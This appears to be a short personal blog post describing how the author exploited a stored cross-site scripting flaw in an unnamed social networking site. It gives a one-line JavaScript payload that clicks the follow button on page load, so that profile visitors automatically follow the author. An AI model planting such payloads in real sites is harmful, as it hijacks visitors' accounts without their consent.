Have fun with stored cross site scripting

Actually we can do lots of different things with XSS ; thought we always pop-up a message!  Anyway that’s enough for concept proofing rather than do more practically.

Here, I’m gonna show you how to exploit a cross site scripting vulnerability successfully using another social networking service.  Finally,  If someone view my profile, automatically he will be a my follower.

screenshot-from-2017-03-04-10-53-53

I noticed that line 154 is vulnerable after common xss test.  There wasn’t any filter in this input ; because web application is guided you to use previously defined locations. But we can use javascripts too 🙂

afce1280-eb8d-4249-bef8-8658c2f201f9

When we actually click on TRACK button, web application handle our actions with trackButtonsearch1 identity. So  i can use js click() event to click on it.  But before that, i would like to know more about how really webApp handle these things.  I saw there is a cool external js file called ‘all.js’

image

I opened it and paste all codes to http://jsbeautifier.org to prepare codes for reading!  Then i got something interesting.  See, they handle TRACK/UNTRACK actions using jquery.

screenshot-from-2017-03-04-11-42-32

And there were several more functions for handle various kinds of actions.  Actually read these files are not required to launch the  attack , but better feeling!  😉

So this was my payload.


window.onload = function (){document.getElementById(''trackButtonsearch1'').click()}

(within script tags)
I had to insert elementId withing more ‘ coz, webapp ignored single ‘ mark.  There are more several ways to click on a button in js.  Perhaps i would use jquery, but i didn’t use because developers hadn’t use original min.js file.

Hope you meet somethings interesting in s-xss.

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

Create a website or blog at WordPress.com

Up ↑

%d bloggers like this: